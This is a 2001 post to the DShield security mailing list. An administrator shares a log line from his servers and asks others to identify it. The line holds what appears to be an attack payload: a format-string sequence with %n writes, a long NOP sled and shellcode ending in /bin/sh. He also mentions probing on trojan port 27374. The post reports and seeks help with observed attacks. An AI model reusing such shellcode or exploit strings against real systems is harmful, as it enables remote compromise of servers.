[Dshield] buffer overflow?

ALEPH0 aleph0 at pacbell.net
Thu Nov 15 05:45:37 GMT 2001


Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
to get a shell attempt.  They are in repetitive groups and on each of my
servers on one of my networks.  Anyone know this one in particcular and if I
should be concerned?  What I don't know is what is SERVER here.

Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'

I also run a bunch of homebuilt fake logging daemons on many trojan ports
and found on this same network a lot of activity on port 27374 starting a
couple days ago.





More information about the list mailing list